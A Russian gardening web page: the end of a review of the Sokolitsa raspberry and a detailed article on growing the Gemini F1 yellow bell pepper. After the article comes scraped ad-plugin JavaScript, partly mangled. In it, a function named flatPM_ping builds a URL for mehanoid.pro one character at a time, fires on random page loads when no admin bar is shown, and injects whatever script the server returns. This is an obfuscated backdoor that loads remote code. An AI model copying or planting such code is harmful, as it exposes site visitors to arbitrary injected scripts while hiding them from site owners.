Учитывая, что на территорию Украины, России сорт попал начиная с 2014 г — имеется ввиду относительно массовое распространение, отзывы о малине Соколица достаточно скупые и малочисленные. Однозначно отмечается правильная форма и размер, высокая плотность плодов, красивый цвет крупных костянок. Она хорошо транспортируется, не страдает при перевозке. По отзывам польских фермеров, она пригодна для коммерческого выращивания в открытом грунте, проводятся пробные работы по выращиванию в грунте и закрытом. Чтобы не забегать вперед, делая поспешные оптимистические выводы, стоит отметить, что урожайность его в пределах линейки средних коммерческих сортов польской селекции. Точных данных, опять же, на сегодня мало, но ясно одно: сорт перспективный, внимания заслуживает, продолжение его изучения следует. Доброго урожая!

Перец Джемини: описание и характеристика желтого гибрида

Сорта и гибриды овощных культур, которые выведены голландскими специалистами, пользуются заслуженной популярностью у овощеводов из разных стран мира. Эти культуры отличаются хорошей урожайностью, высокой устойчивостью к болезням и нападениям вредителей, также большинство из них обладает стойкостью к изменениям погодных условий.

Одним из лучших гибридов болгарского перца голландской селекции является сорт Джемини, что в переводе с английского означает «близнецы». Такое название связано с тем, что зрелые плоды данного перца отличаются одинаковыми размерами, формой и цветом. С момента выведения данный сорт заинтересовал не только дачников, но и фермеров, которые занимаются выращиванием болгарского перца для дальнейшей реализации.

История создания сорта

Данный гибрид был выведен селекционерами из голландской агрофирмы Nunhems, которая является филиалом известной компании Bayer. Данная фирма на протяжении десятилетий занимается выведением новых сортов и гибридов овощных культур, а также распространением семенного материала по Голландии и многим странам Европы и мира.

Перцы Джемини F1: описание и характеристика сорта

Плоды перца Джемини хорошо узнаваемы – ровные, крупные, насыщенной желтой окраски, с приятным вкусом. Дачникам нравится хорошая урожайность сорта, крупноплодность и прекрасные вкусовые качества, а те, кто занимается выращиванием Джемини в промышленных масштабах, оценили неприхотливость гибрида и прекрасные товарные качества спелого перца.

Фото перца Джемини F1

Гибрид Джемини F1 отличается ранними сроками созревания – от прорастания семенного материала до сбора спелой продукции проходит около 2,5 месяцев.

Кустики имеют компактный размер, они отличаются раскидистостью, количество листвы на побегах – среднее. В высоту побеги могут составлять до 0,6 м. Листва – крупная, морщинистая, темно-изумрудной окраски. Благодаря своей величине, листики защищают зреющие плоды от палящих солнечных лучей.

Спелые перчики имеют кубовидно-удлиненную пониклую форму. На каждом кусте формируется не более 10 плодов. Толщина стенок перца может составлять до 8 мм, каждый плод имеет 4 камеры. В период созревания плоды окрашены в темно-зеленый цвет. Полностью созревшие перцы имеют канареечную окраску. Окрашиваются плоды медленно.

Самый вкусный перец Джемини F1 — видео

Длина и диаметр спелых перцев примерно равны – около 17,5 см. Спеющие в теплице плоды крупнее, чем те, которые выросли на грядках в огороде. Масса тепличных плодов – 320-325 г, а тех, что выросли в огороде – около 220-225 г.

Кожица у плодов – гладкая, ее толщина – менее средней. Мякоть – нежная и сочная, а ее вкус – достаточно сладкий с легкой горчинкой, как у настоящего болгарского перца.

Сорт устойчив к жаре, благодаря широким большим листьям плоды защищены от солнечных лучей, не получают ожогов и не пекутся.

Плоды имеют универсальное назначение: их используют при приготовлении салатов и различных закусок, первых и вторых блюд, а также в консервации. Из этого сорта получается вкусное лечо.

Урожай созревает дружно, плоды отличаются примерно одинаковыми размерами и хорошим товарным видом, они легко отделяются от плодоножек при сборе урожая. Спелые плоды хорошо переносят перевозки на разные расстояния, отличаются хорошей лежкостью, их товарный вид и вкусовые качества при этом не портятся, поэтому гибрид Джемини можно выращивать в промышленных масштабах.

Высаживать данный гибрид можно как на грядках в огороде, так и в пленочных парниках или теплицах.

Этот сорт хорошо переносит понижения температуры, при этом его рост и развитие плодов не замедляются, поэтому болгарский перец Джемини можно выращивать на Урале или в Сибири, где летний период короткий и довольно холодный.

Урожайность

Так как сорт болгарского перца Джемини отличается крупноплодностью, а его плоды – достаточно мясистые, урожайность данного гибрида высока – с гектара обычно собирают до 290-300 центнеров продукции.

Болезни и вредители

У болгарского перца Джемини высокий иммунитет, поэтому они практически не поражаются болезнями, характерными для других сортов этой овощной культуры, в том числе и картофельным вирусом.

Гибрид Джемини прекрасно акклиматизируется в любом климате, и хорошо растет и плодоносит даже при резких изменениях погодных условий.

Достоинства

К основным достоинствам болгарского перца Джемини следует отнести:

    плоды быстро дозревают;

весь урожай созревает дружно и практически одновременно;

спелые перцы имеют большие размеры;

мякоть – нежная, а кожица – хрустящая;

у плодов – приятный сладковатый вкус с легкой горчинкой;

кустики достаточно компактны и имеют среднюю величину, поэтому сорт сладкого перца Джемини можно выращивать даже на маленьких огородах;

кусты данного сорта способны приспосабливаться к любым погодным условиям;

высокая стойкость к большинству болезней, а также к нападениям насекомых-вредителей и их личинок;

  • универсальность назначения собранного урожая.
  • Основных недостатков у данного болгарского перца немного:

    сорт Джемини требователен к количеству внесенных удобрений. При недостатке питательных веществ в почве кожица плодов становится слишком тонкой, а в мякоти не хватает сочности;

стебли у данного сорта слишком тонкие и часто могут не выдерживать веса зреющих плодов, и могут ломаться. Поэтому несмотря на небольшую высоту побегов, их следует подвязывать по мере созревания плодов;

  • перцы Джемини могут иметь неравномерную окраску в период полной биологической зрелости, что снижает их товарный вид.
  • Сладкий перец Джемини F1 — видео

    Посадка перца Джемини на рассаду, в открытый грунт и теплицу

    Следует помнить, что болгарский перец Джемини является гибридом, поэтому его семена, собранные со зрелых плодов, не подойдут для дальнейшей посадки – выросшие из них растения не будут иметь положительных родительских качеств. Поэтому семенной материал приходится приобретать ежегодно в специализированных магазинах.

    Фото посадки перца в открытый грунт

    Данный гибрид выращивается рассадным способом. В южных регионах, где рассаду пересаживают на грядки раньше, чем в других областях, высевать семена перца Джемини на рассаду следует во второй декаде февраля. В областях с более холодным климатом сеять семена на рассаду необходимо в начале марта.

    Фото рассады перцев

    Корневая система перцев Джемини – нежная, поэтому растения плохо переносят пересадки и пикировку. Опытные овощеводы рекомендуют сразу высаживать семенной материал данного сорта по отдельным емкостям (лучше в торфяные стаканчики). Вместе с торфяной тарой выросшую рассаду можно будет высаживать на постоянное место. При этом корни не будут повреждаться, растение быстрее акклиматизируется на новом месте, а торфяной стаканчик, разлагаясь в грунте, станет дополнительным удобрением.

    Так как эти растения любят хорошее освещение и тепло, с момента посадки емкости нужно держать на подоконнике при температуре около 23 градусов Цельсия. Первые всходы появляются примерно через пару недель после посадки.

    Для нормального роста сеянцев необходимо, чтобы они получали определенное количество света в течение дня, им достаточно 12 часового светового дня. Если освещения не хватает, необходимо досвечивать рассаду, устанавливая рядом фитолампы.

    Фото посадки перцев в теплицу

    За период выращивания рассады перца Джемини ее следует подкормить азотосодержащими удобрениями не менее двух раз. Первую подкормку проводят на стадии двух настоящих листьев, следующее внесение удобрений производят через пару недель после первого, но не позднее, чем за 10 дней до пересадки в открытый грунт или в теплицу.

    За 10-12 дней до пересадки сеянцев на грядки их следует закаливать. Для этого растения выносят на свежий воздух сначала ненадолго — всего минут на 30, но постепенно время пребывания на балконе или лоджии увеличивают.

    На постоянное место подросшую здоровую рассаду рекомендуется высаживать в возрасте 1,5 месяцев. В зависимости от региона выращивания срок посадки будет разным – на юге болгарский перец Джемини пересаживают в открытый грунт уже во второй декаде мая, а в более холодных областях – в начале июня.

    Садим рассаду перцев в открытый грунт( теплицу). Состав почвы, полив — видео

    К этому времени рост молоденьких перчиков должен составлять около 16,5 см, на каждом растении выросло не менее 5 настоящих листочков. Допустимо, чтобы на кустиках рассады появились бутоны.

    Место для посадки должно находиться на небольшой возвышенности (или на ровной поверхности) и быть защищенным от сильных порывов ветра иди сквозняка.

    Почвы должны быть достаточно рыхлыми и питательными, желательно – карбонатными.

    Лучшие предшественники для данной овощной культуры – все разновидности капусты, горох, фасоль, соя, а также зерновые.

    На каждом квадрате площади рекомендуется высаживать не более 3 сеянцев болгарского перца. Схема посадки рассады данного сорта – 0,5*0,4 м.

    Фото схемы посадки перцев

    Температура почвы при посадке сеянцев должна прогреться до +14+16 градусов Цельсия.

    В посадочные ямки на дно выкладывают питательный субстрат, в который добавлена органика и минеральные удобрения.

    После посадки растения обильно поливают и мульчируют любой органикой.

    Дальнейший уход за сортом перца Джемини

    Дальнейший уход за этим болгарским перцем заключается в регулярных поливах (лучше использовать капельное орошение), рыхлении почвы после поливов, удалении сорной травы, внесении слоя мульчи.

    При поливах нужно следить за влажностью грунта, не допуская его переувлажнения. Первые бутоны на растениях удаляют.

    Фото полива перцев

    Перец Джемини рекомендуется формировать в два стебля, чтобы урожайность кустов была максимальной. Кустики требуют подвязки по мере созревания плодов.

    На каждом кусте рекомендуется оставлять не более 10 плодов, удаляя лишние, иначе перчики могут мельчать, так как на большое количество завязей не хватает питательных веществ.

    Как подкармливать перцы

    Грядки под болгарский перец готовят заранее, при этом с осени под перекопку на каждый квадрат площади вносят до 6 кг перегноя или компоста.

    В течение лета подкармливают перец Джемени трижды минеральными удобрениями, содержащими фосфор и калий:

      первая подкормка проводится через 12-14 дней после пересадки сеянцев на постоянное место роста;

    второй раз удобрения вносят в период цветения;

  • последнюю подкормку производят, когда плоды начинают желтеть.
  • Отзывы о перце Джемини

    Перец Джемини – прекрасный компактный раннеспелый сорт с высокой урожайностью и хорошими вкусовыми качествами плодов. Выращивать его можно на огородных грядках или в теплице в большинстве российских регионов.

    Описание от производителя

    Раннеспелый, чрезвычайно продуктивный гибрид. От всходов до технической спелости 85-90 дней.
    Растение среднерослое, компактное, высотой до 60 см, одновременно формирует до 10 плодов-«близнецов» внушительных размеров. Плоды красивой удлиненно-кубовидной формы, до 18 см длиной, гладкие и блестящие, массой 200-250 г, в технической спелости
    темно-зеленые, в биологической — ярко-желтые. Толщина мясистой стенки 5,5 -7 мм. Вкусовые качества отличные, товарность высокая. Отмечается хорошая облиственность, которая защищает плоды от солнечных ожогов. Устойчив к стрессовым и неблагоприятным погодным условиям, поэтому подходит для выращивания в регионах с прохладным и коротким летом. При температуре +25+28°C семена прорастают на 10-й день. Высевать только пророщенные семена. У Джемини F1 высокий иммунитет к основным заболеваниям перца на всех этапах роста, в том числе и к вирусу картофеля. Подходит для консервирования, домашней кулинарии и свежего потребления. Рекомендуется для выращивания в открытом грунте и плёночных теплицах. Плотность посадки 3-4 растения/м2. Урожайность в открытом грунте 4,0-5,0 кг/м2, в защищённом – 7,0-9,0 кг/м2.

    Ссылка на основную публикацию
    Adblock
    detector
    ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
    '+c+"
    "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
    Закрыть через '+o.how.outgoing.timer_count+"
    ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
    '+c+"
    ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
    '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
    "],tbody:[1,"","
    "],colgroup:[2,"","
    "],col:[3,"","
    "],tr:[2,"","
    "],td:[3,"","
    "],th:[3,"","
    "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
    '+a+" через "+o+'
    '+n+'
    ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
    ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};